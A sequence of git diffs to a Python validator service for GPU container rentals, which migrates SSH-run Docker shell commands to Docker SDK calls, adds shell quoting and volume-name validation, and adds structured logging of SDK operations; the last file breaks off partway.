+                error_type=FailedContainerErrorTypes.ContainerStartFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
             )
 
     async def delete_container(
@@ -3192,17 +3519,26 @@ class DockerService:
             )
 
         try:
-            async with asyncssh.connect(
-                host=executor_info.address,
-                port=executor_info.ssh_port,
-                username=executor_info.ssh_username,
-                client_keys=[pkey],
-                known_hosts=known_hosts_policy,
-            ) as ssh_client:
+            async with (
+                asyncssh.connect(
+                    host=executor_info.address,
+                    port=executor_info.ssh_port,
+                    username=executor_info.ssh_username,
+                    client_keys=[pkey],
+                    known_hosts=known_hosts_policy,
+                ) as ssh_client,
+                self.rental_docker_client_factory.connect(
+                    executor_info=executor_info,
+                    private_key=private_key,
+                ) as docker_client,
+            ):
                 # await ssh_client.run(f"docker stop {payload.container_name}")
-                command = f"/usr/bin/docker rm -fv {payload.container_name}"
                 try:
-                    await retry_ssh_command(ssh_client, command, "delete_container", 3, 5)
+                    await docker_client.remove_container(
+                        container_name=payload.container_name,
+                        force=True,
+                        remove_volumes=True,
+                    )
                 except Exception as exc:
                     if (
                         payload.workload_kind != WorkloadKind.FILLER
@@ -3568,7 +3904,6 @@ class DockerService:
         )
 
         private_key = self.ssh_service.decrypt_payload(keypair.ss58_address, private_key)
-        pkey = asyncssh.import_private_key(private_key)
 
         known_hosts_policy: asyncssh.SSHKnownHosts | None = None
         try:
@@ -3594,37 +3929,38 @@ class DockerService:
             )
 
         try:
-            async with asyncssh.connect(
-                host=executor_info.address,
-                port=executor_info.ssh_port,
-                username=executor_info.ssh_username,
-                client_keys=[pkey],
-                known_hosts=known_hosts_policy,
-            ) as ssh_client:
-                if not payload.user_public_keys:
-                    log_text = _m(
-                        "ssh key Add error: no public key",
-                        extra=get_extra_info({
-                            **default_extra,
-                            "container_name": payload.container_name,
-                            "error": "No public keys",
-                        }),
-                    )
-                    logger.error(log_text)
+            if not payload.user_public_keys:
+                log_text = _m(
+                    "ssh key Add error: no public key",
+                    extra=get_extra_info({
+                        **default_extra,
+                        "container_name": payload.container_name,
+                        "error": "No public keys",
+                    }),
+                )
+                logger.error(log_text)
 
-                    return FailedContainerRequest(
-                        miner_hotkey=payload.miner_hotkey,
-                        executor_id=payload.executor_id,
-                        pod_id=payload.pod_id,
-                        workload_kind=payload.workload_kind,
-                        msg=str(log_text),
-                        error_type=FailedContainerErrorTypes.AddSSkeyFailed,
-                        error_code=FailedContainerErrorCodes.NoSshKeys,
-                    )
+                return FailedContainerRequest(
+                    miner_hotkey=payload.miner_hotkey,
+                    executor_id=payload.executor_id,
+                    pod_id=payload.pod_id,
+                    workload_kind=payload.workload_kind,
+                    msg=str(log_text),
+                    error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                    error_code=FailedContainerErrorCodes.NoSshKeys,
+                )
 
-                for public_key in payload.user_public_keys:
-                    command = f"/usr/bin/docker exec -i {payload.container_name} sh -c 'echo \"{public_key}\" >> ~/.ssh/authorized_keys'"
-                    await retry_ssh_command(ssh_client, command, "add_ssh_key", 3, 5)
+            async with self.rental_docker_client_factory.connect(
+                executor_info=executor_info,
+                private_key=private_key,
+            ) as docker_client:
+                await self.add_ssh_public_keys_with_rental_docker(
+                    docker_client=docker_client,
+                    container_name=payload.container_name,
+                    public_keys=payload.user_public_keys,
+                    log_tag=f"add_ssh_key_{payload.pod_id}",
+                    log_extra=default_extra,
+                )
 
                 logger.info(
                     _m(

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -74,6 +74,7 @@ from services.rental_docker_sdk import (
     build_authorized_keys_exec_spec,
     build_container_command_argv,
     build_environment_exec_spec,
+    build_remove_authorized_keys_exec_spec,
 )
 from services.ssh_service import SSHService
 
@@ -1545,6 +1546,44 @@ class DockerService:
             )
             raise Exception(
                 "Failed to add SSH public keys: "
+                f"exit_status={result.exit_status}; "
+                f"stderr={result.stderr}; stdout={result.stdout}"
+            )
+
+    async def remove_ssh_public_keys_with_rental_docker(
+        self,
+        docker_client: RentalDockerSdkClient,
+        *,
+        container_name: str,
+        public_keys: list[str] | tuple[str, ...],
+        log_tag: str,
+        log_extra: dict,
+    ) -> None:
+        exec_spec = build_remove_authorized_keys_exec_spec(
+            container_name=container_name,
+            public_keys=public_keys,
+        )
+        result = await docker_client.exec_in_container(exec_spec)
+        if result.exit_status != 0:
+            await self.stream_log(
+                result.stderr or result.stdout or "Failed to remove SSH public keys",
+                "error",
+                log_tag,
+            )
+            logger.warning(
+                _m(
+                    "Failed to remove SSH public keys",
+                    extra=get_extra_info({
+                        **log_extra,
+                        "container_name": container_name,
+                        "exit_status": result.exit_status,
+                        "stdout": result.stdout,
+                        "stderr": result.stderr,
+                    }),
+                )
+            )
+            raise Exception(
+                "Failed to remove SSH public keys: "
                 f"exit_status={result.exit_status}; "
                 f"stderr={result.stderr}; stdout={result.stdout}"
             )
@@ -3513,22 +3552,16 @@ class DockerService:
         )
 
         try:
-            local_volume_quoted = (
+            if payload.local_volume:
                 _quote_safe_docker_volume_name(
                     payload.local_volume,
                     field_name="local_volume",
                 )
-                if payload.local_volume
-                else None
-            )
-            external_volume_quoted = (
+            if payload.external_volume:
                 _quote_safe_docker_volume_name(
                     payload.external_volume,
                     field_name="external_volume",
                 )
-                if payload.external_volume
-                else None
-            )
         except ValueError as exc:
             log_text = _m(
                 "Invalid Docker volume name",
@@ -3619,16 +3652,13 @@ class DockerService:
                     default_extra=default_extra,
                 )
 
-                command = f"/usr/bin/docker image prune -f"
-                await retry_ssh_command(ssh_client, command, "delete_container", 3, 5)
+                await docker_client.prune_images()
 
-                if local_volume_quoted:
-                    command = f"/usr/bin/docker volume rm {local_volume_quoted}"
-                    await ssh_client.run(command)
+                if payload.local_volume:
+                    await docker_client.remove_volume(volume_name=payload.local_volume)
 
-                if external_volume_quoted:
-                    command = f"/usr/bin/docker volume rm {external_volume_quoted}"
-                    await ssh_client.run(command)
+                if payload.external_volume:
+                    await docker_client.remove_volume(volume_name=payload.external_volume)
                     await self.disable_s3fs_volume_plugin(ssh_client)
 
                 logger.info(
@@ -3826,11 +3856,9 @@ class DockerService:
         )
 
         private_key = self.ssh_service.decrypt_payload(keypair.ss58_address, private_key)
-        pkey = asyncssh.import_private_key(private_key)
 
-        known_hosts_policy: asyncssh.SSHKnownHosts | None = None
         try:
-            known_hosts_policy = await self._prepare_known_hosts_policy(
+            await self._prepare_known_hosts_policy(
                 executor_info,
                 payload.miner_hotkey,
                 default_extra,
@@ -3852,50 +3880,38 @@ class DockerService:
             )
 
         try:
-            async with asyncssh.connect(
-                host=executor_info.address,
-                port=executor_info.ssh_port,
-                username=executor_info.ssh_username,
-                client_keys=[pkey],
-                known_hosts=known_hosts_policy,
-            ) as ssh_client:
-                if not payload.user_public_keys:
-                    log_text = _m(
-                        "ssh key Remove error: no public key",
-                        extra=get_extra_info({
-                            **default_extra,
-                            "container_name": payload.container_name,
-                            "error": "No public keys",
-                        }),
-                    )
-                    logger.error(log_text)
+            if not payload.user_public_keys:
+                log_text = _m(
+                    "ssh key Remove error: no public key",
+                    extra=get_extra_info({
+                        **default_extra,
+                        "container_name": payload.container_name,
+                        "error": "No public keys",
+                    }),
+                )
+                logger.error(log_text)
 
-                    return FailedContainerRequest(
-                        miner_hotkey=payload.miner_hotkey,
-                        executor_id=payload.executor_id,
-                        pod_id=payload.pod_id,
-                        workload_kind=payload.workload_kind,
-                        msg=str(log_text),
-                        error_type=FailedContainerErrorTypes.AddSSkeyFailed,
-                        error_code=FailedContainerErrorCodes.NoSshKeys,
-                    )
+                return FailedContainerRequest(
+                    miner_hotkey=payload.miner_hotkey,
+                    executor_id=payload.executor_id,
+                    pod_id=payload.pod_id,
+                    workload_kind=payload.workload_kind,
+                    msg=str(log_text),
+                    error_type=FailedContainerErrorTypes.AddSSkeyFailed,
+                    error_code=FailedContainerErrorCodes.NoSshKeys,
+                )
 
-                # Remove each public key from authorized_keys
-                for pubkey in payload.user_public_keys:
-                    # Remove the public key from authorized_keys
-                    # Properly escape slashes and pluses in pubkey for sed
-                    # Use Python's shlex.quote to safely quote the pubkey for shell usage
-                    import shlex
-
-                    # Remove the public key from authorized_keys by matching the exact line
-                    # This approach is safer and more reliable than trying to escape characters for sed
-                    quoted_pubkey = shlex.quote(pubkey)
-                    remove_cmd = (
-                        f"/usr/bin/docker exec -i {payload.container_name} "
-                        f"sh -c \"grep -vxF {quoted_pubkey} /root/.ssh/authorized_keys > /root/.ssh/authorized_keys.tmp && "
-                        f"mv /root/.ssh/authorized_keys.tmp /root/.ssh/authorized_keys\""
-                    )
-                    await ssh_client.run(remove_cmd)
+            async with self.rental_docker_client_factory.connect(
+                executor_info=executor_info,
+                private_key=private_key,
+            ) as docker_client:
+                await self.remove_ssh_public_keys_with_rental_docker(
+                    docker_client=docker_client,
+                    container_name=payload.container_name,
+                    public_keys=payload.user_public_keys,
+                    log_tag=f"remove_ssh_keys_{payload.pod_id}",
+                    log_extra=default_extra,
+                )
 
                 logger.info(
                     _m(

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -63,6 +63,11 @@ from services.redis_service import (
 )
 from services.attestation_service import AttestationService, AttestationError
 from services.nvidia_devices import build_gpu_docker_config_for_executor
+from services.rental_docker_observability import (
+    exec_logged_rental_docker_sdk_operation,
+    rental_run_spec_log_fields,
+    run_logged_rental_docker_sdk_operation,
+)
 from services.rental_docker_sdk import (
     ContainerExecSpec,
     ContainerRunSpec,
@@ -426,7 +431,13 @@ class DockerService:
         vloopback_mount_repair_attempted = False
         while True:
             try:
-                await docker_client.run_container(run_spec)
+                await run_logged_rental_docker_sdk_operation(
+                    operation="run_container",
+                    log_extra=default_extra,
+                    call=lambda: docker_client.run_container(run_spec),
+                    attempt=attempt + 1,
+                    **rental_run_spec_log_fields(run_spec),
+                )
                 return
             except Exception as exc:
                 if _should_repair_stale_mountpoint(
@@ -490,7 +501,14 @@ class DockerService:
         warning_event: str,
     ) -> None:
         try:
-            await docker_client.remove_container(
+            await run_logged_rental_docker_sdk_operation(
+                operation="remove_failed_container_for_retry",
+                log_extra=default_extra,
+                call=lambda: docker_client.remove_container(
+                    container_name=container_name,
+                    force=True,
+                    remove_volumes=False,
+                ),
                 container_name=container_name,
                 force=True,
                 remove_volumes=False,
@@ -1440,7 +1458,12 @@ class DockerService:
         )
 
         try:
-            create_result = await docker_client.exec_in_container(create_spec)
+            create_result = await exec_logged_rental_docker_sdk_operation(
+                docker_client=docker_client,
+                operation="exec_create_ssh_bootstrap_script",
+                exec_spec=create_spec,
+                log_extra=log_extra,
+            )
         except Exception as exc:
             await self.stream_log(
                 "Failed to create SSH bootstrap script in container",
@@ -1482,7 +1505,12 @@ class DockerService:
             )
             return False
 
-        run_result = await docker_client.exec_in_container(run_spec)
+        run_result = await exec_logged_rental_docker_sdk_operation(
+            docker_client=docker_client,
+            operation="exec_run_ssh_bootstrap_script",
+            exec_spec=run_spec,
+            log_extra=log_extra,
+        )
         if run_result.exit_status != 0:
             await self.stream_log(
                 run_result.stderr or run_result.stdout or "SSH bootstrap script failed",
@@ -1518,7 +1546,12 @@ class DockerService:
             container_name=container_name,
             public_keys=public_keys,
         )
-        result = await docker_client.exec_in_container(exec_spec)
+        result = await exec_logged_rental_docker_sdk_operation(
+            docker_client=docker_client,
+            operation="exec_add_authorized_keys",
+            exec_spec=exec_spec,
+            log_extra=log_extra,
+        )
         if result.exit_status != 0:
             await self.stream_log(
                 result.stderr or result.stdout or "Failed to add SSH public keys",
@@ -1556,7 +1589,12 @@ class DockerService:
             container_name=container_name,
             public_keys=public_keys,
         )
-        result = await docker_client.exec_in_container(exec_spec)
+        result = await exec_logged_rental_docker_sdk_operation(
+            docker_client=docker_client,
+            operation="exec_remove_authorized_keys",
+            exec_spec=exec_spec,
+            log_extra=log_extra,
+        )
         if result.exit_status != 0:
             await self.stream_log(
                 result.stderr or result.stdout or "Failed to remove SSH public keys",
@@ -1598,7 +1636,12 @@ class DockerService:
             return True
 
         try:
-            result = await docker_client.exec_in_container(exec_spec)
+            result = await exec_logged_rental_docker_sdk_operation(
+                docker_client=docker_client,
+                operation="exec_append_environment",
+                exec_spec=exec_spec,
+                log_extra=log_extra,
+            )
         except Exception as exc:
             await self.stream_log("Failed to set environment variables", "error", log_tag)
             logger.warning(
@@ -2811,9 +2854,15 @@ class DockerService:
                 if payload.docker_username and payload.docker_password:
                     current_step = "docker_login"
                     try:
-                        await docker_client.login(
-                            username=payload.docker_username,
-                            password=payload.docker_password,
+                        await run_logged_rental_docker_sdk_operation(
+                            operation="login",
+                            log_extra=default_extra,
+                            call=lambda: docker_client.login(
+                                username=payload.docker_username,
+                                password=payload.docker_password,
+                            ),
+                            username_present=True,
+                            username_len=len(payload.docker_username),
                         )
                     except Exception as exc:
                         logger.warning(
@@ -2868,7 +2917,12 @@ class DockerService:
                         "success",
                         log_tag,
                     )
-                    await docker_client.pull(image=payload.docker_image)
+                    await run_logged_rental_docker_sdk_operation(
+                        operation="pull",
+                        log_extra=default_extra,
+                        call=lambda: docker_client.pull(image=payload.docker_image),
+                        image=payload.docker_image,
+                    )
 
                     # Add profiler for docker pull
                     profilers.append(ProfilerStep.since(ProfilerStepName.DOCKER_PULL, prev_timestamp))
@@ -3389,7 +3443,12 @@ class DockerService:
                 executor_info=executor_info,
                 private_key=private_key,
             ) as docker_client:
-                await docker_client.stop(container_name=payload.container_name)
+                await run_logged_rental_docker_sdk_operation(
+                    operation="stop_container",
+                    log_extra=default_extra,
+                    call=lambda: docker_client.stop(container_name=payload.container_name),
+                    container_name=payload.container_name,
+                )
         except Exception as exc:
             log_text = _m(
                 "Failed stop_container",
@@ -3473,7 +3532,12 @@ class DockerService:
                 executor_info=executor_info,
                 private_key=private_key,
             ) as docker_client:
-                await docker_client.start(container_name=payload.container_name)
+                await run_logged_rental_docker_sdk_operation(
+                    operation="start_container",
+                    log_extra=default_extra,
+                    call=lambda: docker_client.start(container_name=payload.container_name),
+                    container_name=payload.container_name,
+                )
                 ssh_bootstrap_ok = await self.install_open_ssh_server_and_start_ssh_service_with_rental_docker(
                     docker_client=docker_client,
                     container_name=payload.container_name,
@@ -3612,7 +3676,14 @@ class DockerService:
                 ) as docker_client,
             ):
                 try:
-                    await docker_client.remove_container(
+                    await run_logged_rental_docker_sdk_operation(
+                        operation="remove_container",
+                        log_extra=default_extra,
+                        call=lambda: docker_client.remove_container(
+                            container_name=payload.container_name,
+                            force=True,
+                            remove_volumes=True,
+                        ),
                         container_name=payload.container_name,
                         force=True,
                         remove_volumes=True,
@@ -3644,13 +3715,33 @@ class DockerService:
                     default_extra=default_extra,
                 )
 
-                await docker_client.prune_images()
+                await run_logged_rental_docker_sdk_operation(
+                    operation="prune_images",
+                    log_extra=default_extra,
+                    call=docker_client.prune_images,
+                )
 
                 if payload.local_volume:
-                    await docker_client.remove_volume(volume_name=payload.local_volume)
+                    await run_logged_rental_docker_sdk_operation(
+                        operation="remove_volume",
+                        log_extra=default_extra,
+                        call=lambda: docker_client.remove_volume(
+                            volume_name=payload.local_volume
+                        ),
+                        volume_name=payload.local_volume,
+                        volume_role="local",
+                    )
 
                 if payload.external_volume:
-                    await docker_client.remove_volume(volume_name=payload.external_volume)
+                    await run_logged_rental_docker_sdk_operation(
+                        operation="remove_volume",
+                        log_extra=default_extra,
+                        call=lambda: docker_client.remove_volume(
+                            volume_name=payload.external_volume
+                        ),
+                        volume_name=payload.external_volume,
+                        volume_role="external",
+                    )
                     await self.disable_s3fs_volume_plugin(ssh_client)
 
                 logger.info(

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -447,6 +447,7 @@ class DockerService:
         container_name: str,
         default_extra: dict,
         local_volume: str | None = None,
+        log_tag: str = "container_creation",
     ) -> None:
         deadline = time.monotonic() + _PORT_ALLOCATED_RETRY_BUDGET_SEC
         attempt = 0
@@ -512,6 +513,21 @@ class DockerService:
                     )
                     continue
 
+                error_text = str(exc)
+                logger.error(
+                    _m(
+                        "Docker SDK run container failed",
+                        extra=get_extra_info(
+                            {
+                                **default_extra,
+                                "container_name": container_name,
+                                "error": error_text,
+                            }
+                        ),
+                    ),
+                    exc_info=True,
+                )
+                await self.stream_log(error_text, "error", log_tag)
                 raise
 
     async def _remove_failed_rental_container_for_retry(
@@ -3185,6 +3201,7 @@ class DockerService:
                         container_name=container_name,
                         default_extra=default_extra,
                         local_volume=local_volume,
+                        log_tag=log_tag,
                     )
 
                     logger.info(f"Container creation step finished")

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -190,6 +190,12 @@ def _is_safe_docker_volume_name(volume_name: str) -> bool:
     return bool(_DOCKER_VOLUME_NAME_RE.fullmatch(volume_name))
 
 
+def _quote_safe_docker_volume_name(volume_name: str, *, field_name: str) -> str:
+    if not _is_safe_docker_volume_name(volume_name):
+        raise ValueError(f"Unsafe Docker volume name for {field_name}: {volume_name!r}")
+    return shlex.quote(volume_name)
+
+
 def _is_vloopback_driver(driver: str) -> bool:
     return driver == _VLOOPBACK_DRIVER_PREFIX or driver.startswith(f"{_VLOOPBACK_DRIVER_PREFIX}:")
 
@@ -970,8 +976,9 @@ class DockerService:
     ):
         """Check if the container is running"""
         start_time = time.time()
+        name_filter = shlex.quote(f"name={container_name}")
         while time.time() - start_time < timeout:
-            result = await ssh_client.run(f"/usr/bin/docker ps -q -f name={container_name}")
+            result = await ssh_client.run(f"/usr/bin/docker ps -q --filter {name_filter}")
             if result.stdout.strip():
                 return True
             await asyncio.sleep(1)
@@ -1020,14 +1027,16 @@ class DockerService:
         """
         container_prefix = f"container_{miner_hotkey}_"
         health_check_prefix = "health_check_"
+        container_filter = shlex.quote(f"name=^{container_prefix}")
+        health_check_filter = shlex.quote(f"name=^{health_check_prefix}")
 
         async def _run_checks(client: asyncssh.SSHClientConnection) -> tuple[bool, str]:
             for attempt in range(max_retries + 1):
                 # docker ps OR-s multiple --filter name= flags
                 command = (
                     '/usr/bin/docker ps --format "{{.Names}}" '
-                    f'--filter "name=^{container_prefix}" '
-                    f'--filter "name=^{health_check_prefix}"'
+                    f"--filter {container_filter} "
+                    f"--filter {health_check_filter}"
                 )
                 result = await client.run(command)
 
@@ -1055,10 +1064,10 @@ class DockerService:
 
                     # Force remove containers matching either prefix.
                     remove_cmd = (
-                        "docker ps -q "
-                        f"--filter 'name=^{container_prefix}' "
-                        f"--filter 'name=^{health_check_prefix}' "
-                        "| xargs -r docker rm -f"
+                        "/usr/bin/docker ps -q "
+                        f"--filter {container_filter} "
+                        f"--filter {health_check_filter} "
+                        "| xargs -r /usr/bin/docker rm -f"
                     )
                     await client.run(remove_cmd)
 
@@ -1790,6 +1799,10 @@ class DockerService:
         sparse: bool = False,
     ):
         requested_timeout = timeout
+        local_volume_quoted = _quote_safe_docker_volume_name(
+            local_volume,
+            field_name="local_volume",
+        )
         if limit:
             # install loopback plugin
             loopback_plugin_name = "vloopback"
@@ -1797,7 +1810,12 @@ class DockerService:
             docker_root_dir = await self.get_docker_root_dir(ssh_client)
             logger.info(_m(f"Docker data root: {docker_root_dir}", extra=get_extra_info(log_extra)))
 
-            command = f'/usr/bin/docker plugin install ashald/docker-volume-loopback --alias {loopback_plugin_name} --grant-all-permissions DATA_DIR="{docker_root_dir}/loopback"'
+            loopback_plugin_arg = shlex.quote(loopback_plugin_name)
+            data_dir_arg = shlex.quote(f"DATA_DIR={docker_root_dir}/loopback")
+            command = (
+                "/usr/bin/docker plugin install ashald/docker-volume-loopback "
+                f"--alias {loopback_plugin_arg} --grant-all-permissions {data_dir_arg}"
+            )
             await ssh_client.run(command)
 
             # DAH-2265 Plan 3: the loopback plugin preallocates the whole backing file
@@ -1807,13 +1825,14 @@ class DockerService:
             # leaves its unwritten space free in df AND still counts its declared size in
             # resolve_volume_sizing(), double-counting the pool and overcommitting host disk.
             sparse_opt = " -o sparse=true" if sparse else ""
+            size_arg = shlex.quote(f"size={limit}g")
             command = (
-                f'/usr/bin/docker volume create -d {loopback_plugin_name} '
-                f'{local_volume} -o size={limit}g{sparse_opt}'
+                f"/usr/bin/docker volume create -d {loopback_plugin_arg} "
+                f"{local_volume_quoted} -o {size_arg}{sparse_opt}"
             )
         else:
             loopback_plugin_name = None
-            command = f"/usr/bin/docker volume create {local_volume}"
+            command = f"/usr/bin/docker volume create {local_volume_quoted}"
 
         timeout = self._get_local_volume_create_timeout(limit, timeout)
         volume_log_extra = {
@@ -3026,11 +3045,12 @@ class DockerService:
                         # failures; logs --tail covers entrypoint failures.
                         failure_reason = ""
                         try:
+                            container_name_quoted = shlex.quote(container_name)
                             inspect = await ssh_client.run(
-                                f"/usr/bin/docker inspect -f '{{{{.State.Error}}}}' {container_name}"
+                                f"/usr/bin/docker inspect -f '{{{{.State.Error}}}}' {container_name_quoted}"
                             )
                             logs_tail = await ssh_client.run(
-                                f"/usr/bin/docker logs --tail 50 {container_name} 2>&1 || true"
+                                f"/usr/bin/docker logs --tail 50 {container_name_quoted} 2>&1 || true"
                             )
                             failure_reason = (inspect.stdout or "") + "\n" + (logs_tail.stdout or "")
                         except Exception:
@@ -3492,6 +3512,39 @@ class DockerService:
             ),
         )
 
+        try:
+            local_volume_quoted = (
+                _quote_safe_docker_volume_name(
+                    payload.local_volume,
+                    field_name="local_volume",
+                )
+                if payload.local_volume
+                else None
+            )
+            external_volume_quoted = (
+                _quote_safe_docker_volume_name(
+                    payload.external_volume,
+                    field_name="external_volume",
+                )
+                if payload.external_volume
+                else None
+            )
+        except ValueError as exc:
+            log_text = _m(
+                "Invalid Docker volume name",
+                extra=get_extra_info({**default_extra, "error": str(exc)}),
+            )
+            logger.error(log_text)
+            return FailedContainerRequest(
+                miner_hotkey=payload.miner_hotkey,
+                executor_id=payload.executor_id,
+                pod_id=payload.pod_id,
+                workload_kind=payload.workload_kind,
+                msg=str(log_text),
+                error_type=FailedContainerErrorTypes.ContainerDeletionFailed,
+                error_code=FailedContainerErrorCodes.UnknownError,
+            )
+
         private_key = self.ssh_service.decrypt_payload(keypair.ss58_address, private_key)
         pkey = asyncssh.import_private_key(private_key)
 
@@ -3569,12 +3622,12 @@ class DockerService:
                 command = f"/usr/bin/docker image prune -f"
                 await retry_ssh_command(ssh_client, command, "delete_container", 3, 5)
 
-                if payload.local_volume:
-                    command = f"/usr/bin/docker volume rm {payload.local_volume}"
+                if local_volume_quoted:
+                    command = f"/usr/bin/docker volume rm {local_volume_quoted}"
                     await ssh_client.run(command)
 
-                if payload.external_volume:
-                    command = f"/usr/bin/docker volume rm {payload.external_volume}"
+                if external_volume_quoted:
+                    command = f"/usr/bin/docker volume rm {external_volume_quoted}"
                     await ssh_client.run(command)
                     await self.disable_s3fs_volume_plugin(ssh_client)
 

--- a/neurons/validators/src/services/docker_service.py
+++ b/neurons/validators/src/services/docker_service.py
@@ -1865,6 +1865,7 @@ class DockerService:
     async def create_local_volume(
         self,
         ssh_client: asyncssh.SSHClientConnection,
+        docker_client: RentalDockerSdkClient,
         local_volume: str,
         log_tag: str,
         log_text: str,
@@ -1874,7 +1875,7 @@ class DockerService:
         sparse: bool = False,
     ):
         requested_timeout = timeout
-        local_volume_quoted = _quote_safe_docker_volume_name(
+        _quote_safe_docker_volume_name(
             local_volume,
             field_name="local_volume",
         )
@@ -1891,6 +1892,9 @@ class DockerService:
                 "/usr/bin/docker plugin install ashald/docker-volume-loopback "
                 f"--alias {loopback_plugin_arg} --grant-all-permissions {data_dir_arg}"
             )
+            # TODO: migrate Docker plugin management if/when plugin setup becomes
+            # part of the SDK migration scope. The user-controlled volume name is
+            # not used in this shell command; volume creation below is SDK-backed.
             await ssh_client.run(command)
 
             # DAH-2265 Plan 3: the loopback plugin preallocates the whole backing file
@@ -1899,15 +1903,14 @@ class DockerService:
             # full-node rentals only — see the caller — because a sparse partial volume
             # leaves its unwritten space free in df AND still counts its declared size in
             # resolve_volume_sizing(), double-counting the pool and overcommitting host disk.
-            sparse_opt = " -o sparse=true" if sparse else ""
-            size_arg = shlex.quote(f"size={limit}g")
-            command = (
-                f"/usr/bin/docker volume create -d {loopback_plugin_arg} "
-                f"{local_volume_quoted} -o {size_arg}{sparse_opt}"
-            )
+            volume_driver = loopback_plugin_name
+            volume_driver_opts = {"size": f"{limit}g"}
+            if sparse:
+                volume_driver_opts["sparse"] = "true"
         else:
             loopback_plugin_name = None
-            command = f"/usr/bin/docker volume create {local_volume_quoted}"
+            volume_driver = None
+            volume_driver_opts = None
 
         timeout = self._get_local_volume_create_timeout(limit, timeout)
         volume_log_extra = {
@@ -1926,13 +1929,20 @@ class DockerService:
                 extra=get_extra_info(volume_log_extra),
             )
         )
-        await self.execute_and_stream_logs(
-            ssh_client=ssh_client,
-            command=command,
-            log_tag=log_tag,
-            log_text=log_text,
+        await self.stream_log(log_text, "success", log_tag)
+        await run_logged_rental_docker_sdk_operation(
+            operation="create_volume",
             log_extra=volume_log_extra,
-            timeout=timeout,
+            call=lambda: docker_client.create_volume(
+                volume_name=local_volume,
+                driver=volume_driver,
+                driver_opts=volume_driver_opts,
+                timeout=timeout,
+            ),
+            volume_name=local_volume,
+            volume_driver=volume_driver,
+            volume_driver_opts=volume_driver_opts,
+            timeout_seconds=timeout,
         )
 
     async def _get_fs_available_bytes(
@@ -3029,6 +3039,7 @@ class DockerService:
                     )
                     await self.create_local_volume(
                         ssh_client=ssh_client,
+                        docker_client=docker_client,
                         local_volume=local_volume,
                         log_tag=log_tag,
                         log_text=f"Creating docker volume {local_volume}",

--- a/neurons/validators/src/services/nvidia_devices.py
+++ b/neurons/validators/src/services/nvidia_devices.py
@@ -39,6 +39,8 @@ from collections.abc import Sequence
 
 import asyncssh
 
+from services.rental_docker_sdk import GpuDockerConfig, build_gpu_docker_config
+
 logger = logging.getLogger(__name__)
 
 _PROC_GPU_INFO_CMD = (
@@ -73,6 +75,18 @@ async def build_gpu_flags(
     at WARNING). The pod will still be created in the legacy path; it just
     won't survive `systemctl daemon-reload` on the executor host.
     """
+    gpu_config = await build_gpu_docker_config_for_executor(ssh_client, gpu_uuids)
+    device_flags = _device_flags(
+        tuple(device.path_on_host for device in gpu_config.device_mounts)
+    )
+    return " ".join(flag for flag in (_gpus_flag(gpu_uuids), device_flags) if flag)
+
+
+async def build_gpu_docker_config_for_executor(
+    ssh_client: asyncssh.SSHClientConnection,
+    gpu_uuids: Sequence[str] | None,
+) -> GpuDockerConfig:
+    """Resolve structured GPU Docker options for SDK container creation."""
     try:
         if gpu_uuids:
             per_gpu, host_total = await _query_gpu_nodes_for_uuids(ssh_client, gpu_uuids)
@@ -87,8 +101,7 @@ async def build_gpu_flags(
         # We don't sell MIG slices today, but stripping caps under partial rental
         # closes the leak before that ever ships.
         shared = await _query_shared_nodes(ssh_client, include_caps=not is_partial_rental)
-        device_flags = _device_flags((*per_gpu, *shared))
-        return " ".join(flag for flag in (_gpus_flag(gpu_uuids), device_flags) if flag)
+        return build_gpu_docker_config(gpu_uuids, device_nodes=(*per_gpu, *shared))
     except Exception:
         logger.warning(
             "nvidia_devices: probe failed, falling back to legacy --gpus only "
@@ -96,7 +109,7 @@ async def build_gpu_flags(
             exc_info=True,
             extra={"gpu_uuids": list(gpu_uuids) if gpu_uuids else None},
         )
-        return _gpus_flag(gpu_uuids)
+        return build_gpu_docker_config(gpu_uuids)
 
 
 def _gpus_flag(gpu_uuids: Sequence[str] | None) -> str:

--- a/neurons/validators/src/services/rental_docker_observability.py
+++ b/neurons/validators/src/services/rental_docker_observability.py
@@ -1,0 +1,226 @@
+import logging
+import time
+from collections.abc import Awaitable, Callable
+from typing import TypeVar
+
+from core.utils import _m, get_extra_info
+from services.rental_docker_sdk import (
+    ContainerExecResult,
+    ContainerExecSpec,
+    ContainerRunSpec,
+    RentalDockerSdkClient,
+)
+
+logger = logging.getLogger(__name__)
+
+_DOCKER_SDK_LOG_OUTPUT_LIMIT = 2000
+_T = TypeVar("_T")
+
+
+def _truncate_log_text(value: object, limit: int = _DOCKER_SDK_LOG_OUTPUT_LIMIT) -> str:
+    text = "" if value is None else str(value)
+    if len(text) <= limit:
+        return text
+    return f"{text[:limit]}...<truncated {len(text) - limit} chars>"
+
+
+def _stdin_size(value: str | bytes | None) -> int:
+    if value is None:
+        return 0
+    if isinstance(value, bytes):
+        return len(value)
+    return len(value.encode())
+
+
+def _exec_result_log_fields(result: ContainerExecResult) -> dict:
+    return {
+        "exit_status": result.exit_status,
+        "stdout_len": len(result.stdout),
+        "stderr_len": len(result.stderr),
+        "stdout": _truncate_log_text(result.stdout),
+        "stderr": _truncate_log_text(result.stderr),
+    }
+
+
+def log_rental_docker_sdk_operation(
+    *,
+    operation: str,
+    status: str,
+    log_extra: dict,
+    level: int = logging.INFO,
+    **fields,
+) -> None:
+    clean_fields = {
+        key: value
+        for key, value in fields.items()
+        if value is not None
+    }
+    logger.log(
+        level,
+        _m(
+            f"Rental Docker SDK operation {status}",
+            extra=get_extra_info(
+                {
+                    **log_extra,
+                    "docker_access": "sdk",
+                    "docker_operation": operation,
+                    "operation_status": status,
+                    "host_shell_command": False,
+                    **clean_fields,
+                }
+            ),
+        ),
+    )
+
+
+async def run_logged_rental_docker_sdk_operation(
+    *,
+    operation: str,
+    log_extra: dict,
+    call: Callable[[], Awaitable[_T]],
+    **fields,
+) -> _T:
+    start = time.monotonic()
+    log_rental_docker_sdk_operation(
+        operation=operation,
+        status="started",
+        log_extra=log_extra,
+        **fields,
+    )
+    try:
+        result = await call()
+    except Exception as exc:
+        log_rental_docker_sdk_operation(
+            operation=operation,
+            status="failed",
+            log_extra=log_extra,
+            level=logging.ERROR,
+            duration_ms=int((time.monotonic() - start) * 1000),
+            error=str(exc),
